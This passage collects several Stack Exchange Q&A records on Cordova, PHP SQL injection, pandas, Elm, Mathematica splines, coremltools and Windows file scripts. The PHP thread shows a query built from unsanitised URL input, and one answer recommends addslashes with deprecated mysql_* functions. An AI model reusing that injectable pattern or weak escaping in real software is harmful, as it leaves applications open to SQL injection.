It should be extended by the user to load the specific\n * html file that contains the application.\n *\n * As an example:\n * \n * <pre>\n * package org.apache.cordova.examples;\n *\n * import android.os.Bundle;\n * import org.apache.cordova.*;\n *\n * public class Example extends CordovaActivity {\n * @Override\n * public void onCreate(Bundle savedInstanceState) {\n * super.onCreate(savedInstanceState);\n * super.init();\n * \/\/ Load your application\n * loadUrl(launchUrl);\n * }\n * }\n * <\/pre>\n * \n * Cordova xml configuration: Cordova uses a configuration file at \n * res\/xml\/config.xml to specify its settings. See \"The config.xml File\"\n * guide in cordova-docs at http:\/\/cordova.apache.org\/docs for the documentation\n * for the configuration. The use of the set*Property() methods is\n * deprecated in favor of the config.xml file.\n *\n *\/\npublic class CordovaActivity extends Activity {\n public static String TAG = \"CordovaActivity\";\n\n \/\/ The webview for our app\n protected CordovaWebView appView;\n\n private static int ACTIVITY_STARTING = 0;\n private static int ACTIVITY_RUNNING = 1;\n private static int ACTIVITY_EXITING = 2;\n\n \/\/ Keep app running when pause is received. (default = true)\n \/\/ If true, then the JavaScript and native code continue to run in the background\n \/\/ when another application (activity) is started.\n protected boolean keepRunning = true;\n\n \/\/ Flag to keep immersive mode if set to fullscreen\n protected boolean immersiveMode;\n\n \/\/ Read from config.xml:\n protected CordovaPreferences preferences;\n protected String launchUrl;\n protected ArrayList<PluginEntry> pluginEntries;\n protected CordovaInterfaceImpl cordovaInterface;\n\n \/**\n * Called when the activity is first created.\n *\/\n @Override\n public void onCreate(Bundle savedInstanceState) {\n LOG.i(TAG, \"Apache Cordova native platform version \" + CordovaWebView.CORDOVA_VERSION + \" is starting\");\n LOG.d(TAG, \"CordovaActivity.onCreate()\");\n\n \/\/ need to activate preferences before super.onCreate to avoid \"requestFeature() must be called before adding content\" exception\n loadConfig();\n if (!preferences.getBoolean(\"ShowTitle\", false)) {\n getWindow().requestFeature(Window.FEATURE_NO_TITLE);\n }\n\n if (preferences.getBoolean(\"SetFullscreen\", false)) {\n Log.d(TAG, \"The SetFullscreen configuration is deprecated in favor of Fullscreen, and will be removed in a future version.\");\n preferences.set(\"Fullscreen\", true);\n }\n if (preferences.getBoolean(\"Fullscreen\", false)) {\n if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {\n immersiveMode = true;\n } else {\n getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,\n WindowManager.LayoutParams.FLAG_FULLSCREEN);\n }\n } else {\n getWindow().setFlags(WindowManager.LayoutParams.FLAG_FORCE_NOT_FULLSCREEN,\n WindowManager.LayoutParams.FLAG_FORCE_NOT_FULLSCREEN);\n }\n\n super.onCreate(savedInstanceState);\n\n cordovaInterface = makeCordovaInterface();\n if (savedInstanceState != null) {\n cordovaInterface.restoreInstanceState(savedInstanceState);\n }\n }\n\n protected void init() {\n appView = makeWebView();\n createViews();\n if (!appView.isInitialized()) {\n appView.init(cordovaInterface, pluginEntries, preferences);\n }\n cordovaInterface.onCordovaInit(appView.getPluginManager());\n\n \/\/ Wire the hardware volume controls to control media if desired.\n String volumePref = preferences.getString(\"DefaultVolumeStream\", \"\");\n if 
(\"media\".equals(volumePref.toLowerCase(Locale.ENGLISH))) {\n setVolumeControlStream(AudioManager.STREAM_MUSIC);\n }\n }\n\n @SuppressWarnings(\"deprecation\")\n protected void loadConfig() {\n ConfigXmlParser parser = new ConfigXmlParser();\n parser.parse(this);\n preferences = parser.getPreferences();\n preferences.setPreferencesBundle(getIntent().getExtras());\n launchUrl = parser.getLaunchUrl();\n pluginEntries = parser.getPluginEntries();\n Config.parser = parser;\n }\n\n \/\/Suppressing warnings in AndroidStudio\n @SuppressWarnings({\"deprecation\", \"ResourceType\"})\n protected void createViews() {\n \/\/Why are we setting a constant as the ID? This should be investigated\n appView.getView().setId(100);\n appView.getView().setLayoutParams(new FrameLayout.LayoutParams(\n ViewGroup.LayoutParams.MATCH_PARENT,\n ViewGroup.LayoutParams.MATCH_PARENT));\n\n setContentView(appView.getView());\n\n if (preferences.contains(\"BackgroundColor\")) {\n int backgroundColor = preferences.getInteger(\"BackgroundColor\", Color.BLACK);\n \/\/ Background of activity:\n appView.getView().setBackgroundColor(backgroundColor);\n }\n\n appView.getView().requestFocusFromTouch();\n }\n\n \/**\n * Construct the default web view object.\n * <p\/>\n * Override this to customize the webview that is used.\n *\/\n protected CordovaWebView makeWebView() {\n return new CordovaWebViewImpl(makeWebViewEngine());\n }\n\n protected CordovaWebViewEngine makeWebViewEngine() {\n return CordovaWebViewImpl.createEngine(this, preferences);\n }\n\n protected CordovaInterfaceImpl makeCordovaInterface() {\n return new CordovaInterfaceImpl(this) {\n @Override\n public Object onMessage(String id, Object data) {\n \/\/ Plumb this to CordovaActivity.onMessage for backwards compatibility\n return CordovaActivity.this.onMessage(id, data);\n }\n };\n }\n\n \/**\n * Load the url into the webview.\n *\/\n public void loadUrl(String url) {\n if (appView == null) {\n init();\n }\n\n \/\/ If keepRunning\n this.keepRunning = preferences.getBoolean(\"KeepRunning\", true);\n\n appView.loadUrlIntoView(url, true);\n }\n\n \/**\n * Called when the system is about to start resuming a previous activity.\n *\/\n @Override\n protected void onPause() {\n super.onPause();\n LOG.d(TAG, \"Paused the activity.\");\n\n if (this.appView != null) {\n \/\/ CB-9382 If there is an activity that started for result and main activity is waiting for callback\n \/\/ result, we shoudn't stop WebView Javascript timers, as activity for result might be using them\n boolean keepRunning = this.keepRunning || this.cordovaInterface.activityResultCallback != null;\n this.appView.handlePause(keepRunning);\n }\n }\n\n \/**\n * Called when the activity receives a new intent\n *\/\n @Override\n protected void onNewIntent(Intent intent) {\n super.onNewIntent(intent);\n \/\/Forward to plugins\n if (this.appView != null)\n this.appView.onNewIntent(intent);\n }\n\n \/**\n * Called when the activity will start interacting with the user.\n *\/\n @Override\n protected void onResume() {\n super.onResume();\n LOG.d(TAG, \"Resumed the activity.\");\n\n if (this.appView == null) {\n return;\n }\n \/\/ Force window to have focus, so application always\n \/\/ receive user input. 
Workaround for some devices (Samsung Galaxy Note 3 at least)\n this.getWindow().getDecorView().requestFocus();\n\n this.appView.handleResume(this.keepRunning);\n }\n\n \/**\n * Called when the activity is no longer visible to the user.\n *\/\n @Override\n protected void onStop() {\n super.onStop();\n LOG.d(TAG, \"Stopped the activity.\");\n\n if (this.appView == null) {\n return;\n }\n this.appView.handleStop();\n }\n\n \/**\n * Called when the activity is becoming visible to the user.\n *\/\n @Override\n protected void onStart() {\n super.onStart();\n LOG.d(TAG, \"Started the activity.\");\n\n if (this.appView == null) {\n return;\n }\n this.appView.handleStart();\n }\n\n \/**\n * The final call you receive before your activity is destroyed.\n *\/\n @Override\n public void onDestroy() {\n LOG.d(TAG, \"CordovaActivity.onDestroy()\");\n super.onDestroy();\n\n if (this.appView != null) {\n appView.handleDestroy();\n }\n }\n\n \/**\n * Called when view focus is changed\n *\/\n @Override\n public void onWindowFocusChanged(boolean hasFocus) {\n super.onWindowFocusChanged(hasFocus);\n if (hasFocus && immersiveMode) {\n final int uiOptions = View.SYSTEM_UI_FLAG_LAYOUT_STABLE\n | View.SYSTEM_UI_FLAG_LAYOUT_HIDE_NAVIGATION\n | View.SYSTEM_UI_FLAG_LAYOUT_FULLSCREEN\n | View.SYSTEM_UI_FLAG_HIDE_NAVIGATION\n | View.SYSTEM_UI_FLAG_FULLSCREEN\n | View.SYSTEM_UI_FLAG_IMMERSIVE_STICKY;\n\n getWindow().getDecorView().setSystemUiVisibility(uiOptions);\n }\n }\n\n @SuppressLint(\"NewApi\")\n @Override\n public void startActivityForResult(Intent intent, int requestCode, Bundle options) {\n \/\/ Capture requestCode here so that it is captured in the setActivityResultCallback() case.\n cordovaInterface.setActivityResultRequestCode(requestCode);\n super.startActivityForResult(intent, requestCode, options);\n }\n\n \/**\n * Called when an activity you launched exits, giving you the requestCode you started it with,\n * the resultCode it returned, and any additional data from it.\n *\n * @param requestCode The request code originally supplied to startActivityForResult(),\n * allowing you to identify who this result came from.\n * @param resultCode The integer result code returned by the child activity through its setResult().\n * @param intent An Intent, which can return result data to the caller (various data can be attached to Intent \"extras\").\n *\/\n @Override\n protected void onActivityResult(int requestCode, int resultCode, Intent intent) {\n LOG.d(TAG, \"Incoming Result. Request code = \" + requestCode);\n super.onActivityResult(requestCode, resultCode, intent);\n cordovaInterface.onActivityResult(requestCode, resultCode, intent);\n }\n\n \/**\n * Report an error to the host application. These errors are unrecoverable (i.e. 
the main resource is unavailable).\n * The errorCode parameter corresponds to one of the ERROR_* constants.\n *\n * @param errorCode The error code corresponding to an ERROR_* value.\n * @param description A String describing the error.\n * @param failingUrl The url that failed to load.\n *\/\n public void onReceivedError(final int errorCode, final String description, final String failingUrl) {\n final CordovaActivity me = this;\n\n \/\/ If errorUrl specified, then load it\n final String errorUrl = preferences.getString(\"errorUrl\", null);\n if ((errorUrl != null) && (!failingUrl.equals(errorUrl)) && (appView != null)) {\n \/\/ Load URL on UI thread\n me.runOnUiThread(new Runnable() {\n public void run() {\n me.appView.showWebPage(errorUrl, false, true, null);\n }\n });\n }\n \/\/ If not, then display error dialog\n else {\n final boolean exit = !(errorCode == WebViewClient.ERROR_HOST_LOOKUP);\n me.runOnUiThread(new Runnable() {\n public void run() {\n if (exit) {\n me.appView.getView().setVisibility(View.GONE);\n me.displayError(\"Application Error\", description + \" (\" + failingUrl + \")\", \"OK\", exit);\n }\n }\n });\n }\n }\n\n \/**\n * Display an error dialog and optionally exit application.\n *\/\n public void displayError(final String title, final String message, final String button, final boolean exit) {\n final CordovaActivity me = this;\n me.runOnUiThread(new Runnable() {\n public void run() {\n try {\n AlertDialog.Builder dlg = new AlertDialog.Builder(me);\n dlg.setMessage(message);\n dlg.setTitle(title);\n dlg.setCancelable(false);\n dlg.setPositiveButton(button,\n new AlertDialog.OnClickListener() {\n public void onClick(DialogInterface dialog, int which) {\n dialog.dismiss();\n if (exit) {\n finish();\n }\n }\n });\n dlg.create();\n dlg.show();\n } catch (Exception e) {\n finish();\n }\n }\n });\n }\n\n \/*\n * Hook in Cordova for menu plugins\n *\/\n @Override\n public boolean onCreateOptionsMenu(Menu menu) {\n if (appView != null) {\n appView.getPluginManager().postMessage(\"onCreateOptionsMenu\", menu);\n }\n return super.onCreateOptionsMenu(menu);\n }\n\n @Override\n public boolean onPrepareOptionsMenu(Menu menu) {\n if (appView != null) {\n appView.getPluginManager().postMessage(\"onPrepareOptionsMenu\", menu);\n }\n return true;\n }\n\n @Override\n public boolean onOptionsItemSelected(MenuItem item) {\n if (appView != null) {\n appView.getPluginManager().postMessage(\"onOptionsItemSelected\", item);\n }\n return true;\n }\n\n \/**\n * Called when a message is sent to plugin.\n *\n * @param id The message id\n * @param data The message data\n * @return Object or null\n *\/\n public Object onMessage(String id, Object data) {\n if (\"onReceivedError\".equals(id)) {\n JSONObject d = (JSONObject) data;\n try {\n this.onReceivedError(d.getInt(\"errorCode\"), d.getString(\"description\"), d.getString(\"url\"));\n } catch (JSONException e) {\n e.printStackTrace();\n }\n } else if (\"exit\".equals(id)) {\n finish();\n }\n return null;\n }\n\n protected void onSaveInstanceState(Bundle outState) {\n cordovaInterface.onSaveInstanceState(outState);\n super.onSaveInstanceState(outState);\n }\n\n \/**\n * Called by the system when the device configuration changes while your activity is running.\n *\n * @param newConfig The new device configuration\n *\/\n @Override\n public void onConfigurationChanged(Configuration newConfig) {\n super.onConfigurationChanged(newConfig);\n if (this.appView == null) {\n return;\n }\n PluginManager pm = this.appView.getPluginManager();\n if (pm != 
null) {\n pm.onConfigurationChanged(newConfig);\n }\n }\n\n \/**\n * Called by the system when the user grants permissions\n *\n * @param requestCode\n * @param permissions\n * @param grantResults\n *\/\n @Override\n public void onRequestPermissionsResult(int requestCode, String permissions[],\n int[] grantResults) {\n try\n {\n cordovaInterface.onRequestPermissionResult(requestCode, permissions, grantResults);\n }\n catch (JSONException e)\n {\n LOG.d(TAG, \"JSONException: Parameters fed into the method are not valid\");\n e.printStackTrace();\n }\n\n }\n\n}<\/code>\n\nJS included:\n\n<code> \n <script type=\"text\/javascript\" src=\"cordova.js\"><\/script>\n\n <!-- build:js(.) scripts\/vendor.js -->\n <!-- bower:js -->\n <script src=\"bower_components\/jquery\/dist\/jquery.js\"><\/script>\n <script src=\"bower_components\/angular\/angular.js\"><\/script>\n <script src=\"bower_components\/bootstrap\/dist\/js\/bootstrap.js\"><\/script>\n <script src=\"bower_components\/angular-animate\/angular-animate.js\"><\/script>\n <script src=\"bower_components\/angular-cookies\/angular-cookies.js\"><\/script>\n <script src=\"bower_components\/angular-resource\/angular-resource.js\"><\/script>\n <script src=\"bower_components\/angular-route\/angular-route.js\"><\/script>\n <script src=\"bower_components\/angular-sanitize\/angular-sanitize.js\"><\/script>\n <script src=\"bower_components\/angular-touch\/angular-touch.js\"><\/script>\n <!-- endbower -->\n <!-- endbuild -->\n\n <!-- build:js({.tmp,app}) scripts\/scripts.js -->\n <script src=\"scripts\/app.js\"><\/script>\n <script src=\"scripts\/controllers\/main.js\"><\/script>\n <script src=\"scripts\/controllers\/scan.js\"><\/script>\n <script src=\"scripts\/controllers\/payment.js\"><\/script>\n <script src=\"scripts\/services\/cordova.js\"><\/script>\n <!-- endbuild -->\n \n <\/body><\/code>\n\nscreenshot of the folder structure-\n\nWhen I checked thoroughly, there is actually no index.html file generated. What might be the issue?\nComment: Could you post your Script with `JS` includes and `Cordova Activity` code also.\nComment: there you go..edited question and added\nComment: Give a try with adding `super.loadUrl(\"file:\/\/\/android_asset\/www\/index.html\");` in `onCreate` of `Cordova Activity`.\nComment: THERE IS NO index.html file in file:\/\/\/android_asset\/www!\nComment: Copy `index.html` from `App` Directory and Paste same file in `Asset -> www` Folder.\nComment: Still i am getting the Same error!\nAnswer: Cordova load HTML from assets to show UI, you must be missing some step in Apache Cordova CLI. \nSince there is no html pages in Asset that's why cordova is unable to inflate any UI and showing that error. \nWhat you can do \n\nTry to create another project and follow instruction and try to execute commands in proper order.\nonce you have finished step 1 make sure there should be an auto generated index.html along with cordova.js in Asset folder like below :- \nComment: I tried- cordova platform add android rm and again - >cordova platform add android, did not help! Mine is an AJS set up. index.html is the only one missing, all others in place!\nAnswer: You can create assets\/www folder and then add the HTML pages there. In this case, it is index.html.\nYou can follow this tutorial at \nhttp:\/\/www.adobe.com\/devnet\/archive\/html5\/articles\/getting-started-with-phonegap-in-eclipse-for-android.html\nCreate an assets\/www directory and a libs directory inside of the new Android project. 
All of the HTML and JavaScript for your PhoneGap application interface will reside within the assets\/www folder.\n","meta":{"source":"stackoverflow","title":"Cordova - Android - File not found error","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to avoid mysql injection when referencing the web url\n\nQuestion: I have a web page that filtered based on the url path. The address is something like this:\nwww.xxx.com\/player-profile\/?ID=130\nThe page is filtered using the ID field as follows:\n<code>$playerid = $_GET['ID'];\n\n$result = mysql_query(\"SELECT * FROM tblPlayers Where lng_RecordID_PK LIKE \".$playerid.\"\");\n<\/code>\nI want to ensure there are not any security issues with this code. I figure someone may try and manipulate the url. Any suggestions?\nComment: I'm not sure about this , but what about just casting it as int ? would that be safe to prevent injections ?\nAnswer: Use either <code>addslashes<\/code> or <code>mysql_real_escape_string<\/code> functions on <code>$playerid<\/code>. Also, enclose the <code>$playerid<\/code> in quotes when inserting it into your query. Finally, avoid using <code>LIKE<\/code> when a simple <code>=<\/code> would do the exact same thing.\nAnswer: You could use PDO Prepared Statements as a safe way of executing your SQL queries.\nAnswer: Since the ID is numeric there's a very easy and very powerful way of making sure the query remains secure!\n<code>$playerid = $_GET['ID'];\nif (!is_numeric($playerid)) { die(); }\n$playerid = mysql_real_escape_string($playerid); \/\/ Just in case\n<\/code>\nThis code basically makes sure that the ID entered in the URL is numeric, or else it will stop executing the script. If it is numeric, then it will carry on retrieving the data and there is no way of doing any SQL injections.\nHope that helped! :)\nAlso, you might want to change your query to this\n<code>$result = mysql_query(\"SELECT * FROM tblPlayers WHERE lng_RecordID_PK = '\".$playerid.\"' \");\n<\/code>\nComment: (+1) for thinking outside the box. I'd do a traditional real escape too, though. It doesn't hurt to be extra safe. Who knows what character-encoding hacks it'll prevent.\nComment: Thanks :) and actually, I usually do that too. Added it to my answer\nComment: @FakeRainBrigand it is worth to mention that with the original code a \"traditional real escape\" will do no good. While in this answer it is properly used, combined with quotes.\n","meta":{"source":"stackoverflow","title":"how to avoid mysql injection when referencing the web url","dup_signals":{}},"subset":"stackexchange"} +{"text":"DatabaseError: The first argument to execute must be a string or unicode query in python\n\nQuestion: I am trying to return a date selected from date picker in to my sql query in my python code. I also tried using <code>encode(utf-8)<\/code> to remove the unicode string but still, I am getting the error. \nI am new to python. Can anyone please help me figure out how to solve this problem? 
I am using python flask to create the webpage\n<code>if request.method=='POST':\n dateval2 = request.form['datepick']\n dateval = dateval2.encode('utf-8')\n result = (\"SELECT * FROM OE_TAT where convert(date,Time_IST)='?'\",dateval\n df = pd.read_sql_query(result,connection)`\n<\/code>\nError:\n<code>pandas.io.sql.DatabaseError\nDatabaseError: Execution failed on sql '(\"SELECT * FROM OE_TAT where convert(date,Time_IST)='?'\", '2015-06-01')': The first argument to execute must be a string or unicode query.\n<\/code>\nComment: In which format comes the date from the date picker?\nComment: Format : \"yy-mm-dd\" same as my sql server database format\nComment: This is the exact error i am getting : pandas.io.sql.DatabaseError\nDatabaseError: Execution failed on sql '(\"SELECT * FROM OE_TAT where convert(date,Time_IST)='?'\", '2015-06-02')': The first argument to execute must be a string or unicode query.\nComment: You are providing a tuple to [`read_sql_query`](http:\/\/pandas.pydata.org\/pandas-docs\/stable\/generated\/pandas.read_sql_query.html), while the first argument (the query) has to be a string\nAnswer: You are providing a tuple to <code>read_sql_query<\/code>, while the first argument (the query) has to be a string. That's why it gives the error \"The first argument to execute must be a string or unicode query\". \nYou can pass the parameter like this:\n<code>result = \"SELECT * FROM OE_TAT where convert(date,Time_IST)=?\"\ndf = pd.read_sql_query(result, connection, params=(dateval,))\n<\/code>\nNote that the use of <code>?<\/code> depends on the driver you are using (there are different ways to specify parameters, see https:\/\/www.python.org\/dev\/peps\/pep-0249\/#paramstyle). It is possible you will have to use <code>%s<\/code> instead of <code>?<\/code>.\nYou could also format the string in beforehand, like <code>result = \"SELECT * FROM OE_TAT where convert(date,Time_IST)={0}\".format(dateval)<\/code>, however, this is not recommended, see eg here\n","meta":{"source":"stackoverflow","title":"DatabaseError: The first argument to execute must be a string or unicode query in python","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to communicate with a polymorphic child component in Elm?\n\nQuestion: My main program has an <code>update<\/code> function of\n<code>update : Msg -> Model -> ( Model, Cmd Msg )\n<\/code>\nTo communicate with sub-components we can add another variant and wrap our messages in a new message\n<code>type alias Model =\n { ...\n , child : Child.Model\n }\n\ntype Msg\n = ...\n | ChildMsg Child.Msg\n\nupdate msg model =\n case msg of\n ...\n\n ChildMsg childMsg ->\n let\n ( childModel, cmd ) =\n Child.update childMsg model.child\n\n updatedModel =\n { model | child = childModel }\n\n childCmd =\n Cmd.map ChildMsg cmd\n in\n ( updatedModel, childCmd )\n<\/code>\nHowever this seem challenging if the type of my sub-component's <code>update<\/code> function does not match the parent. 
Consider a child with a polymorphic update function:\n<code>-- PolymorphicChild.elm\n\nupdate : Msg a -> Model -> ( Model, Cmd (Msg a) )\n<\/code>\nWhen running a command from this module, I must wrap it\n<code>PolymorphicChild.someCommand : Cmd (Msg Foo)\n\nPolymorphicChild.someCommand\n |> Cmd.map PolymorphicChild\n<\/code>\nHowever, this produces a <code>Msg (PolymorphicChild.Msg Foo)<\/code>, not the <code>Msg PolymorphicChild.Msg<\/code> my App is expecting.\n<code>The right side of (|>) is causing a type mismatch.\n\n(|>)\u00a0is\u00a0expecting\u00a0the\u00a0right\u00a0side\u00a0to\u00a0be\u00a0a:\n\n Cmd\u00a0(PolyMorphicChild.Msg\u00a0Foo)\u00a0->\u00a0a\n\nBut\u00a0the\u00a0right\u00a0side\u00a0is:\n\n Cmd\u00a0Polymorphic.Msg\u00a0->\u00a0Cmd\u00a0Msg\n<\/code>\nI tried adding a polymorphic parameter to <code>App.Msg<\/code>\n<code>-- App.elm\n\ntype Msg a =\n = ..\n | PolymorphicChildMsg (PolymorphicChild.Msg a) \n<\/code>\nBut it basically blows up my entire program. Every function involving <code>App.Msg<\/code> needs to somehow be changed to work with the new child component.\nHow can I unify the two types and get the two components working together?\nComment: This is one of those things where a lot has been made in recent months of trying to get newbies to stop thinking in \"components\", which Elm doesn't really have. Check out \"The life of a File\" https:\/\/www.youtube.com\/watch?v=XpDsk374LDE or \"Scaling Elm Apps\" https:\/\/www.youtube.com\/watch?v=DoA4Txr4GUs for a better theoretical grounding. I still make apps all the time where I have something similar to \"sub-components\", but I try to go with a flat structure for as long as possible, and then refactor when it gets too big and there are too many un-related features in the same update function.\nComment: Can you give some more insight into what you're trying to accomplish? What is the child's purpose? There may be a different approach than bubbling an undetermined type argument up the object graph.\nComment: Making an Elm front end for Wordpress \u2013 there's been some interesting challenges along the way... Here's a [link](https:\/\/ellie-app.com\/Hrqjj3knZza1) to show you what I'm talking about. I can't post all of it on Ellie because it only allows one file, but I think it's enough to get the picture. I've considered just bringing all of this into the main `App` but I was hoping to keep Wordpress backend-related stuff in an isolated module. I'm new to type-based programming so I'm probably doing something dumb...\nComment: @wmakley Thanks for sharing. I actually watched those two videos last week and refactored this module entirely based on what I learned. No more child component :D\nAnswer: I think the problem is that you're leaking too much information in your publicly exposed <code>Msg<\/code> type. Your use of the type parameter of <code>Msg a<\/code> seems limited to a known set of types, either an <code>Author<\/code>, <code>Category<\/code>, <code>Post<\/code>, or <code>Tag<\/code>. From skimming your code, it looks like it will never be anything but one of those four, so the fact that you are abstracting things in this manner should be kept inside of this module rather than exposing it and burdening any other code that may be pulling this in.\nI think you need to move the abstraction down a level to avoid parameterizing your public <code>Msg<\/code> type. 
I would suggest having four concrete constructors for <code>Msg<\/code> instead of parameterizing it, and shift the abstraction down to a helper <code>LoadInfo a<\/code> type:\n<code>type alias LoadInfo a =\n { worker : Worker a\n , url : Url\n , result : Result Http.Error ( Int, List a )\n }\n\ntype Msg\n = LoadPost (LoadInfo Post)\n | LoadCategory (LoadInfo Category)\n | LoadTag (LoadInfo Tag)\n | LoadAuthor (LoadInfo Author)\n<\/code>\nComment: Or even `Http.send (LoadInfo worker url) |> Cmd.map LoadPost` for those that understand it from a `Cmd.map` perspective. Functional programming is premium.\nComment: This looks much nicer, but how do I construct these messages from an Http command?\nComment: Something like `decoder |> Http.get url |> Http.toTask |> Task.attempt (LoadInfo worker url)` ?\nComment: Just shooting from the hip here, but I think this should work: `Http.send (Load << LoadInfo worker url)`\nComment: The power of this is sort of blowing my mind. I'm going to see how other areas of my program can be improved with this technique. Thanks, Chad.\n","meta":{"source":"stackoverflow","title":"How to communicate with a polymorphic child component in Elm?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to make a natural cubic spline of {{x,y}, ...} data\n\nQuestion: Consider\n<code>data = {{0, 0}, {1, 0}, {2, 0}, {3, 1}, {4, 0}, {5, 0}, {6, 0}};\nf = Interpolation[data, InterpolationOrder -> 3, Method -> \"Spline\"];\n<\/code>\nThen the second derivative is continuous and piecewise linear as expected but at the end points I get second derivative <code>f''[0] = f''[6] = -2.57143<\/code>. How does <code>Interpolation<\/code> decide on that at the end points? \nAlso, how can I get a natural cubic spline with second derivative = 0 at each end point?\nAnswer: It is interesting to compare and spot the differences between the routine in this answer and the routine given below:\n<code>naturalSpline[pts_?MatrixQ] := Module[{dy, h, sl, tr},\n h = Differences[pts[[All, 1]]]; dy = Differences[pts[[All, 2]]]\/h;\n tr = SparseArray[{Band[{2, 1}] -> Append[Rest[h], 1], \n Band[{1, 1}] -> Join[{2}, ListCorrelate[{2, 2}, h], {2}], \n Band[{1, 2}] -> Prepend[Most[h], 1]}];\n sl = LinearSolve[tr, Join[{3 dy[[1]]}, \n 3 Total[Partition[dy, 2, 1]\n Reverse[Partition[h, 2, 1], 2], {2}],\n {3 dy[[-1]]}]];\n Interpolation[MapThread[{{#1[[1]]}, #1[[2]], #2} &, {pts, sl}], \n InterpolationOrder -> 3, Method -> \"Hermite\"]]\n<\/code>\nTest on the OP's data:\n<code>data = {{0, 0}, {1, 0}, {2, 0}, {3, 1}, {4, 0}, {5, 0}, {6, 0}};\nspl = naturalSpline[data];\n\n{spl''[0], spl''[6]}\n {0, 0}\n\nPlot[spl[x], {x, 0, 6}, \n Epilog -> {Directive[AbsolutePointSize[4], ColorData[97, 4]], Point[data]}]\n<\/code>\n\nVerify $C^2$ continuity:\n<code>Plot[{spl[x], spl'[x], spl''[x]}, {x, 0, 6}, PlotRange -> All]\n<\/code>\nComment: It's also interesting to contrast this with [this previous natural spline implementation](https:\/\/mathematica.stackexchange.com\/a\/97281).\nAnswer: I augmented your data a bit to force saddle points at the ends\n<code>data = {{0, 0}, {1, 0}, {2, 0}, {3, 1}, {4, 0}, {5, 0}, {6, 0}};\nf = Interpolation[data, InterpolationOrder -> 3, Method -> \"Spline\"];\ng = Interpolation[\n Join[{(# \/\/ First) - {1, 0}}, #, {(# \/\/ Last) + {1, 0}}] &@data, \n Method -> \"Spline\", InterpolationOrder -> 3];\n<\/code>\n\nNow <code>g''[0]==g''[6]==0<\/code>\nComment: Will that give the desired result for any data?\nComment: This should be a bit more general\n`data = Sort@RandomReal[{0, 10}, {10, 
2}];\ndata' = Join[{2*data[[1]] - data[[2]]}, \n data, {2*data[[-1]] - data[[-2]]}];\nf = Interpolation[data'];\nPlot[f[x], Prepend[MinMax[data[[All, 1]]], x], PlotRange -> Full]`\n","meta":{"source":"mathematica.stackexchange","title":"How to make a natural cubic spline of {{x,y}, ...} data","dup_signals":{}},"subset":"stackexchange"} +{"text":"CoreMLTools Keras simple Sequential Linear Regression model export error ('module' object has no attribute 'mobilenet')\n\nQuestion: I've created a very simple Sequential Linear Regression model using Keras 2.0.4 (TensorFlow 1.1.0 backend) and my coremltools (0.6.3) export is failing with this error message:\n--------------------------------------------------------------------------- AttributeError Traceback (most recent call last) in () ----> 1 coreml_model = coremltools.converters.keras.convert(model, input_names=\"input\", output_names=\"output\") \/Users\/Jacopo\/anaconda\/envs\/KerasTensorFlowCoreML\/lib\/python2.7\/site-packages\/coremltools\/converters\/keras\/_keras_converter.pyc in convert(model, input_names, output_names, image_input_names, is_bgr, red_bias, green_bias, blue_bias, gray_bias, image_scale, class_labels, predicted_feature_name, predicted_probabilities_output) 489 predicted_probabilities_output = predicted_probabilities_output) 490 elif _HAS_KERAS2_TF: --> 491 from . import _keras2_converter 492 return _keras2_converter._convert(model = model, 493 input_names = input_names, \/Users\/Jacopo\/anaconda\/envs\/KerasTensorFlowCoreML\/lib\/python2.7\/site-packages\/coremltools\/converters\/keras\/_keras2_converter.py in () 66 _keras.layers.wrappers.TimeDistributed:_layers2.default_skip, 67 ---> 68 _keras.applications.mobilenet.DepthwiseConv2D:_layers2.convert_convolution, 69 70 } AttributeError: 'module' object has no attribute 'mobilenet'\nI'm using Python 2.7 on macOS\nAs said this is a very simple Linear Regression and the module has no image input at all.\nAny hint ?\nThanks, Jacopo\nComment: Did you ever figure this out? I'm getting the same issue.\nComment: Yes Brad, coremltools 0.6.3 works for me with Keras 2.0.6. Even if the dependency note just says 2.0.4+ ;-)\nAnswer: Updating Keras to 2.0.6 worked for me...\nComment: Yes, thanks. Confirm that coremltools (0.6.3) works with Keras 2.0.6\nComment: For coremltools 0.7 I found that Keras 2.0.6 + Tensorflow 1.1 + h5py 2.7.1 was the magic combo. I used virtualenv as recommended by Apple on the coremltools github repo.\nAnswer: coremltools works when keras uses tensorflow, not theano, as its backend. \nyou can change keras' default backend at $HOME\/.keras\/keras.json, and changing to \"backend\": \"tensorflow\".\n","meta":{"source":"stackoverflow","title":"CoreMLTools Keras simple Sequential Linear Regression model export error ('module' object has no attribute 'mobilenet')","dup_signals":{}},"subset":"stackexchange"} +{"text":"Windows batch script to rename and delete files based on extension and time created\n\nQuestion: We have a program that take specific XML files and imports them, then changes the file from .xml to .tmp. Once it turns to .tmp we can delete the file.\nOccasionally what happens is the XML file doesn't import properly, in which case it gets renamed from .xml to .bad and the file has to be manually adjusted (could be an improper xml file or whatever). What we've discovered is that roughly 90% of the time if you rename the file back to .xml it imports fine.\nI've created a batch script to run every couple of minutes that automatically deletes the .tmp files. 
What I also want to do is add something to the script that renames .bad file to .xml in order to let the program try and import it again. That will cover the 90%.\nIn order to cover the last 10%, I'd like to set it up so that after about 10 minutes, it no longer tries to rename the file .bad back to .xml (based on the creation date).\nSo far, what I have is the script to delete the .tmp files:\n<code>forfiles -p \"C:\\path\\to\\xml\" -m *.tmp -c \"cmd \/c del @PATH\"\n<\/code>\nAnd I have the script to rename .bad to .xml:\n<code>forfiles -p \"C:\\path\\to\\xml\" -m *.bad -c \"cmd \/c ren *.bad *.xml\"\n<\/code>\nHow do I tell the 2nd command to do it only for files whose creation date (not last modified date) was less than 10 minutes ago?\nUpdated: \nHere's the full solution (thanks to jon Z for pointing me in the right direction):\n<code>powershell.exe -command \"get-childitem 'path\\to\\xml' -filter *.tmp | Remove-Item\"\n\npowershell.exe -command \"get-childitem 'path\\to\\xml' -filter *.bad | where-object {$_.creationtime -gt (get-date).addminutes(-8)} | foreach-object {move-item $_.fullname ($_.fullname-replace '.bad','.xml')}\"\n<\/code>\nComment: Fixing the import is not possible? Correcting the problem instead of hacking around it would be preferable I would think.\nComment: It would be if there was an automatic way to fix the imported file. Unfortunately there isn't as it could be a result of many different problems. We have to check and fix the file manually.\nAnswer: If using powershell instead of cmd is an option, you could do the following:\nto delete the files:\n<code>get-childitem c:\\path\\to\\xml -filter *.tmp | remove-item\n<\/code>\nto rename the .bad to .xml\n<code>get-childitem c:\\path\\to\\xml 